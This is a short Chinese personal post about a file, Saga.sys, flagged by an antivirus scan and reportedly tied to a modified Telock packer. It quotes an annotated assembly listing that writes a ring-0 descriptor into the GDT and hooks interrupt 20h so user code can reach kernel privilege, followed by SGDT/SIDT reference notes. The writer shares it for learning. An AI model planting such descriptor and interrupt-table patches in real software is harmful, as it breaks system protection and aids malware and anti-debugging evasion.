最近系统又超级慢,狠心下了新的诺顿病毒库,然后扫了一下C盘,被查出来一个Saga.sys,搜了一下,说是hexer、forgot修改的Telock用来防止int3的驱动。
simonzh2000对此文件的注释:
.586p
.mmx
.model flat, stdcall
option casemap: none
assume fs :flat
HOOKINT equ 20h
.code
startup:
nop
nop
nop
nop
pushfd
pushad
push edx
sgdt [esp-2]
pop edx
mov eax,edx ;EDX.EAX->GDT BASE
mov ecx, 3e8h
.if dword ptr [eax+ecx+4]!=00cf9a00h ;3e8 ring0 code32
mov byte ptr [eax],0c3h ;ret
mov dword ptr [eax+ecx],0000ffffh
mov dword ptr [eax+ecx+4],00cf9a00h
.endif
push edx
sidt [esp-2]
pop edx
add edx, HOOKINT*8 ;edx->int 20h
.if dword ptr [edx+2]!=0ee0003e8h ;int 20 gate ->gdt base(ret)
mov dword ptr[edx+2],0ee0003e8h
mov [edx],ax
shr eax, 16
mov [edx+6], ax
.endif
popad
popfd
xor eax, eax
ret 8
end startup
查了一下说明:
SGDT - Store Global Descriptor Table (286+ privileged)
Usage: SGDT dest
Modifies flags: none
Stores the Global Descriptor Table (GDT) Register into the
specified operand.
SIDT - Store Interrupt Descriptor Table (286+ privileged)
Usage: SIDT dest
Modifies flags: none
Stores the Interrupt Descriptor Table (IDT) Register into the
specified operand.
大体理解了一下意思,具体不懂。现在该学的太多了,都不知道从何下手,郁闷